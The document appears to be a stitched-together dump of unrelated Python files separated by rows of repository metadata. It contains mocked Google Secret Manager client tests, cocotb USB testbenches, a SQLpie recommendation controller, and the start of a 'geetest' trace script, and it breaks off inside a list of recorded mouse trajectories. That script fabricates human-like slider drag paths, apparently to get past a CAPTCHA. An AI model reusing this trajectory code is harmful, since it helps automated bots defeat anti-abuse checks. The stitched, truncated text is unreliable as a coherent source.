assert expected_response.secrets[0] == resources[0]
assert len(channel.requests) == 1
expected_request = service_pb2.ListSecretsRequest(parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_secrets_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.project_path("[PROJECT]")
paged_list_response = client.list_secrets(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_create_secret(self):
# Setup Expected Response
name = "name3373707"
expected_response = {"name": name}
expected_response = resources_pb2.Secret(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.project_path("[PROJECT]")
secret_id = "secretId-739547894"
secret = {}
response = client.create_secret(parent, secret_id, secret)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.CreateSecretRequest(
parent=parent, secret_id=secret_id, secret=secret
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.project_path("[PROJECT]")
secret_id = "secretId-739547894"
secret = {}
with pytest.raises(CustomException):
client.create_secret(parent, secret_id, secret)
def test_add_secret_version(self):
# Setup Expected Response
name = "name3373707"
expected_response = {"name": name}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.secret_path("[PROJECT]", "[SECRET]")
payload = {}
response = client.add_secret_version(parent, payload)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.AddSecretVersionRequest(
parent=parent, payload=payload
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_add_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.secret_path("[PROJECT]", "[SECRET]")
payload = {}
with pytest.raises(CustomException):
client.add_secret_version(parent, payload)
def test_get_secret(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.Secret(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_path("[PROJECT]", "[SECRET]")
response = client.get_secret(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.GetSecretRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_path("[PROJECT]", "[SECRET]")
with pytest.raises(CustomException):
client.get_secret(name)
def test_update_secret(self):
# Setup Expected Response
name = "name3373707"
expected_response = {"name": name}
expected_response = resources_pb2.Secret(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
secret = {}
update_mask = {}
response = client.update_secret(secret, update_mask)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.UpdateSecretRequest(
secret=secret, update_mask=update_mask
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
secret = {}
update_mask = {}
with pytest.raises(CustomException):
client.update_secret(secret, update_mask)
def test_delete_secret(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_path("[PROJECT]", "[SECRET]")
client.delete_secret(name)
assert len(channel.requests) == 1
expected_request = service_pb2.DeleteSecretRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_path("[PROJECT]", "[SECRET]")
with pytest.raises(CustomException):
client.delete_secret(name)
def test_list_secret_versions(self):
# Setup Expected Response
next_page_token = ""
total_size = 705419236
versions_element = {}
versions = [versions_element]
expected_response = {
"next_page_token": next_page_token,
"total_size": total_size,
"versions": versions,
}
expected_response = service_pb2.ListSecretVersionsResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.secret_path("[PROJECT]", "[SECRET]")
paged_list_response = client.list_secret_versions(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.versions[0] == resources[0]
assert len(channel.requests) == 1
expected_request = service_pb2.ListSecretVersionsRequest(parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_secret_versions_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.secret_path("[PROJECT]", "[SECRET]")
paged_list_response = client.list_secret_versions(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.get_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.GetSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.get_secret_version(name)
def test_access_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = service_pb2.AccessSecretVersionResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.access_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.AccessSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_access_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.access_secret_version(name)
def test_disable_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.disable_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.DisableSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_disable_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.disable_secret_version(name)
def test_enable_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.enable_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.EnableSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_enable_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.enable_secret_version(name)
def test_destroy_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.destroy_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.DestroySecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_destroy_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.destroy_secret_version(name)
def test_set_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b"21"
expected_response = {"version": version, "etag": etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
resource = "resource-341064690"
policy = {}
response = client.set_iam_policy(resource, policy)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.SetIamPolicyRequest(
resource=resource, policy=policy
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_set_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
resource = "resource-341064690"
policy = {}
with pytest.raises(CustomException):
client.set_iam_policy(resource, policy)
def test_get_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b"21"
expected_response = {"version": version, "etag": etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
resource = "resource-341064690"
response = client.get_iam_policy(resource)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.GetIamPolicyRequest(resource=resource)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
resource = "resource-341064690"
with pytest.raises(CustomException):
client.get_iam_policy(resource)
def test_test_iam_permissions(self):
# Setup Expected Response
expected_response = {}
expected_response = iam_policy_pb2.TestIamPermissionsResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
resource = "resource-341064690"
permissions = []
response = client.test_iam_permissions(resource, permissions)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.TestIamPermissionsRequest(
resource=resource, permissions=permissions
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_test_iam_permissions_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
resource = "resource-341064690"
permissions = []
with pytest.raises(CustomException):
client.test_iam_permissions(resource, permissions)
| 37.823704
| 88
| 0.673612
| 2,637
| 25,531
| 6.273796
| 0.073568
| 0.070721
| 0.025387
| 0.036267
| 0.863213
| 0.827188
| 0.802224
| 0.7908
| 0.7908
| 0.787778
| 0
| 0.017614
| 0.241706
| 25,531
| 674
| 89
| 37.879822
| 0.836932
| 0.079237
| 0
| 0.713647
| 0
| 0
| 0.093647
| 0.055112
| 0
| 0
| 0
| 0
| 0.102908
| 1
| 0.076063
| false
| 0.002237
| 0.020134
| 0.002237
| 0.10962
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58f4a508e50691d097d8ae3b13419c3010623243
| 3,353
|
py
|
Python
|
tests/test-sequence.py
|
antmicro/usb-test-suite-testbenches-
|
c2f83a9b074c8a7f98c835584f58df98e5b2f2d5
|
[
"Apache-2.0"
] | 9
|
2019-09-16T18:46:08.000Z
|
2021-06-20T05:40:12.000Z
|
tests/test-sequence.py
|
antmicro/usb-test-suite-testbenches-
|
c2f83a9b074c8a7f98c835584f58df98e5b2f2d5
|
[
"Apache-2.0"
] | 19
|
2019-09-23T10:58:04.000Z
|
2020-06-02T14:34:55.000Z
|
tests/test-sequence.py
|
antmicro/usb-test-suite-testbenches-
|
c2f83a9b074c8a7f98c835584f58df98e5b2f2d5
|
[
"Apache-2.0"
] | 2
|
2020-05-19T12:22:53.000Z
|
2021-01-07T07:18:08.000Z
|
from os import environ
import cocotb
from cocotb_usb.harness import get_harness
from cocotb_usb.device import UsbDevice
from cocotb_usb.descriptors import Descriptor, getDescriptorRequest
descriptorFile = environ['TARGET_CONFIG']
model = UsbDevice(descriptorFile)
@cocotb.test()
def test_control_transfer_in_out(dut):
harness = get_harness(dut)
harness.max_packet_size = model.deviceDescriptor.bMaxPacketSize0
yield harness.reset()
yield harness.wait(1e3, units="us")
yield harness.port_reset(10e3)
yield harness.connect()
yield harness.wait(1e3, units="us")
# After waiting (bus inactivity) let's start with SOF
yield harness.host_send_sof(0x01)
DEVICE_ADDRESS = 20
yield harness.set_device_address(DEVICE_ADDRESS)
yield harness.control_transfer_in(
DEVICE_ADDRESS,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
yield harness.set_device_address(
11) # This utilizes an OUT control transfer
@cocotb.test()
def test_control_transfer_in_out_in(dut):
"""This transaction is pretty much the first thing any OS will do"""
harness = get_harness(dut)
harness.max_packet_size = model.deviceDescriptor.bMaxPacketSize0
yield harness.reset()
yield harness.wait(1e3, units="us")
yield harness.port_reset(10e3)
yield harness.connect()
yield harness.wait(1e3, units="us")
# After waiting (bus inactivity) let's start with SOF
yield harness.host_send_sof(0x01)
device_address = 0 # After reset
yield harness.control_transfer_in(
device_address,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
device_address = 11
yield harness.set_device_address(
device_address) # This utilizes an OUT control transfer
yield harness.control_transfer_in(
device_address,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
@cocotb.test()
def test_control_transfer_out_in(dut):
harness = get_harness(dut)
harness.max_packet_size = model.deviceDescriptor.bMaxPacketSize0
yield harness.reset()
yield harness.wait(1e3, units="us")
yield harness.port_reset(10e3)
yield harness.connect()
yield harness.wait(1e3, units="us")
# After waiting (bus inactivity) let's start with SOF
yield harness.host_send_sof(0x01)
DEVICE_ADDRESS = 20
yield harness.set_device_address(
DEVICE_ADDRESS) # This utilizes an OUT control transfer
yield harness.control_transfer_in(
DEVICE_ADDRESS,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
| 31.933333
| 72
| 0.653445
| 379
| 3,353
| 5.593668
| 0.195251
| 0.14717
| 0.048113
| 0.053774
| 0.853302
| 0.840094
| 0.809906
| 0.809906
| 0.775
| 0.775
| 0
| 0.025399
| 0.271995
| 3,353
| 104
| 73
| 32.240385
| 0.843097
| 0.129138
| 0
| 0.789474
| 0
| 0
| 0.008612
| 0
| 0
| 0
| 0.009645
| 0
| 0
| 1
| 0.039474
| false
| 0
| 0.065789
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4503d2e58db7f706edeb9e29210bf6efd1aef909
| 3,734
|
py
|
Python
|
sqlpie/controllers/collaborative_controller.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 3
|
2016-01-27T19:49:23.000Z
|
2020-08-18T13:59:02.000Z
|
sqlpie/controllers/collaborative_controller.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | null | null | null |
sqlpie/controllers/collaborative_controller.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 1
|
2016-02-01T01:57:54.000Z
|
2016-02-01T01:57:54.000Z
|
# -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import Response
import json
import sqlpie
class CollaborativeController(sqlpie.BaseController):
@staticmethod
@sqlpie.BaseController.controller_wrapper
def service_similarity(request):
json_data = request.get_json()
if "subject_bucket" in json_data and "subject_id" in json_data and \
"object_bucket" in json_data and "object_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
subject_id = json_data["subject_id"]
object_id = None
predicate = json_data["predicate"]
elif "object_bucket" in json_data and "object_id" in json_data and \
"subject_bucket" in json_data and "subject_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
object_id = json_data["object_id"]
subject_id = None
predicate = json_data["predicate"]
else:
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
if "metric" in json_data:
metric = json_data["metric"]
if metric != "pearson" and metric != "manhattan":
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
else:
metric = "pearson"
if "limit" in json_data and str(json_data["limit"]) == int(json_data["limit"]):
limit = json_data["limit"]
else:
limit = 10
engine = sqlpie.Recommender(subject_bucket, object_bucket, subject_id, object_id, predicate)
results = engine.similarity(limit, metric)
return {'success': True, 'results':results}
@staticmethod
@sqlpie.BaseController.controller_wrapper
def service_recommend(request):
json_data = request.get_json()
if "subject_bucket" in json_data and "subject_id" in json_data and \
"object_bucket" in json_data and "object_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
subject_id = json_data["subject_id"]
object_id = None
predicate = json_data["predicate"]
elif "object_bucket" in json_data and "object_id" in json_data and \
"subject_bucket" in json_data and "subject_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
object_id = json_data["object_id"]
subject_id = None
predicate = json_data["predicate"]
else:
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
if "metric" in json_data:
metric = json_data["metric"]
if metric != "pearson" and metric != "manhattan":
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
else:
metric = "pearson"
if "limit" in json_data and str(json_data["limit"]) == int(json_data["limit"]):
limit = json_data["limit"]
else:
limit = 10
engine = sqlpie.Recommender(subject_bucket, object_bucket, subject_id, object_id, predicate)
results = engine.recommendation(limit, metric)
return {'success': True, 'results':results}
| 40.150538
| 100
| 0.632566
| 431
| 3,734
| 5.220418
| 0.148492
| 0.177778
| 0.106667
| 0.104
| 0.900444
| 0.900444
| 0.900444
| 0.810667
| 0.810667
| 0.810667
| 0
| 0.004804
| 0.275308
| 3,734
| 92
| 101
| 40.586957
| 0.826681
| 0.033208
| 0
| 0.891892
| 0
| 0
| 0.15
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.040541
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
450b8fc583d3caabf6fe7f5ffee32447c74b5ccd
| 13,214
|
py
|
Python
|
bibibi/trace.py
|
DrSxxG/geetest
|
b3b7d782fc6f9b3bad136344aa35d6df5a62eb76
|
[
"MIT"
] | null | null | null |
bibibi/trace.py
|
DrSxxG/geetest
|
b3b7d782fc6f9b3bad136344aa35d6df5a62eb76
|
[
"MIT"
] | null | null | null |
bibibi/trace.py
|
DrSxxG/geetest
|
b3b7d782fc6f9b3bad136344aa35d6df5a62eb76
|
[
"MIT"
] | null | null | null |
import random
import pickle
import re
def get_trace_fast(distance):
track = [[-random.randint(15, 22), -random.randint(22, 25), 0]]
track.append([0, 0, 0])
rand_x = 0
passtime = 40
for i in range(10):
rand_x += int(distance * random.randint(1, 2) / 10)
passtime += random.randint(10, 50)
if rand_x < distance:
track.append([rand_x, random.randint(-2, 2), passtime])
passtime += random.randint(100, 150)
track.append([distance, random.randint(-2, 2), passtime])
return track
def get_trace_normal(distance):
track = [[random.randint(19, 30), random.randint(20, 25), 0]]
count = 0
scale = [0.2, 0.5, random.randint(6, 8) / 10]
while count < distance:
if count < distance * scale[0]:
x = random.randint(1, 2)
elif count < distance * scale[1]:
x = random.randint(3, 4)
elif count < distance * scale[2]:
x = random.randint(5, 6)
elif count < distance * 0.9:
x = random.randint(2, 3)
elif count < distance:
x = 1
count += x
track.append([
x,
random.choice([0, 0, 0, 0, 0, 0, -1, 1]),
random.randint(10, 20)
])
track.append([0, 0, random.randint(300, 400)])
return track
# 得到原始轨迹 [[x,y,t],...]
def format_track(track):
track = re.findall('{(.*?)}', track)
track_list = []
for x in track:
track_list.append([int(_) for _ in x.split(',')])
return track_list
def choice_track_list(dist):
source_track = [
'{-13,-23,0};{0,0,0};{1,0,91};{2,0,96};{5,0,107};{9,0,112};{12,0,121};{15,0,128};{17,0,137};{20,0,144};{23,0,152};{26,0,160};{29,0,168};{32,0,176};{35,0,184};{39,0,192};{44,0,200};{51,0,208};{58,0,216};{64,0,224};{69,0,232};{73,0,240};{78,0,248};{82,0,256};{86,0,264};{90,0,272};{99,0,280};{105,0,288};{114,0,296};{121,0,304};{126,0,312};{132,0,320};{137,0,328};{141,0,336};{146,0,344};{149,0,353};{151,0,360};{154,0,368};{156,0,376};{157,0,385};{158,0,392};{160,0,401};{161,0,408};{162,0,432};{163,0,440};{164,1,448};{166,1,464};{168,1,472};{169,1,480};{170,1,488};{171,1,496};{172,1,504};{173,1,512};{174,1,519};{175,1,528};{176,1,536};{177,1,544};{179,1,552};{180,1,568};{181,1,584};{182,1,600};{183,1,608};{184,1,623};{185,1,632};{186,1,640};{188,1,655};{189,1,664};{191,1,681};{192,1,728};{194,1,760};{194,1,1127};{194,1,1127};{194,1,1127};{194,1,1128};{192,1,1479};{190,1,1511};{189,1,1536};{189,1,1841};',
'{-18,-19,0};{0,0,0};{2,0,256};{4,-1,266};{6,-1,272};{8,-3,282};{9,-3,297};{11,-3,313};{12,-3,360};{13,-4,376};{14,-4,433};{15,-4,449};{16,-4,456};{18,-4,473};{19,-4,520};{19,-4,542};{19,-4,543};{19,-4,543};{19,-4,544};{20,-4,546};{20,-4,549};{20,-4,549};{20,-4,549};{20,-4,550};{20,-4,550};{20,-4,552};{20,-4,552};{20,-4,553};{20,-4,554};{21,-4,585};{22,-4,633};{24,-4,657};{24,-4,678};{24,-4,678};{24,-4,678};{25,-4,728};{27,-4,777};{28,-4,809};{29,-4,858};{30,-4,880};{31,-4,889};{32,-4,920};{33,-4,936};{34,-4,960};{35,-4,984};{36,-4,992};{37,-4,1016};{38,-4,1056};{39,-4,1089};{40,-4,1144};{41,-4,1176};{42,-4,1203};{43,-4,1219};{44,-4,1241};{46,-4,1250};{48,-4,1283};{49,-4,1329};{51,-4,1377};{52,-4,1441};{54,-4,1504};{55,-4,1530};{56,-4,1536};{57,-4,1547};{58,-4,1553};{60,-4,1577};{61,-4,1594};{63,-4,1649};{64,-4,1672};{66,-4,1704};{67,-3,1754};{68,-3,1906};{69,-3,1912};{71,-3,1928};{72,-3,1945};{73,-3,1960};{74,-3,1977};{75,-3,1993};{75,-2,2001};{76,-2,2064};{77,-2,2072};{78,-2,2089};{79,-2,2233};{80,-2,2408};{81,-2,2416};{82,-2,2450};{83,-2,2504};{84,-2,2552};{85,-2,2640};{86,-2,2664};{88,-1,2697};{89,-1,2768};{90,-1,2785};{91,-1,3120};{92,-1,3168};{94,0,3184};{95,0,3224};{96,0,3249};{97,0,3280};{97,1,3304};{98,1,3369};{99,1,3401};{100,1,3448};{101,1,3546};{102,1,3601};{103,1,3656};{104,1,3794};{106,1,3809};{107,1,3825};{108,1,3842};{109,1,3928};{110,1,3976};{111,1,4000};{112,2,4096};{113,2,4224};{114,2,4240};{115,2,4276};{116,3,4296};{117,3,4338};{118,3,4354};{119,3,4392};{120,3,4409};{121,3,4417};{121,4,4424};{122,4,4457};{123,4,4472};{124,4,4512};{125,4,4584};{126,4,4634};{127,4,4656};{128,4,4704};{129,4,4713};{130,4,4728};{131,4,4760};{132,4,4777};{133,4,4784};{134,5,4792};{135,5,4801};{136,5,4809};{138,6,4840};{139,6,4864};{140,6,4888};{141,6,4899};{142,6,4912};{143,6,4946};{144,6,4961};{145,6,4968};{146,6,4994};{147,6,5010};{148,6,5032};{149,6,5080};{150,6,5121};{151,6,5136};{152,6,5241};{153,6,5305};{155,7,5328};{156,7,5489};{157,7,5544};{158,7,5624};{159,7,5632};{160,7,5696};{162,8,5800};{162,9,5824};{163,9,5856};{164,9,5897};{165,9,5912};{166,9,5954};{167,9,5955};{168,9,5968};{169,9,6032};{170,9,6072};{171,9,6108};{172,9,6128};{173,9,6225};{174,9,6256};{175,9,6272};{176,9,6368};{177,9,6416};{178,9,6456};{179,9,6560};{181,10,6600};{182,10,6696};{183,10,6744};{184,10,6760};{185,10,6888};{186,10,6936};{187,10,6976};{188,10,7096};{189,10,7104};{190,10,7129};{191,10,7177};{192,10,7193};{193,10,7200};{194,10,7248};{195,10,7264};{196,10,7280};{198,11,7320};{198,12,7344};{199,12,7352};{200,12,7448};{201,12,7512};{202,12,7521};{203,12,7664};{204,12,7680};{205,12,7720};{206,12,7786};{207,12,7824};{208,13,7840};{209,13,8008};{209,13,8042};',
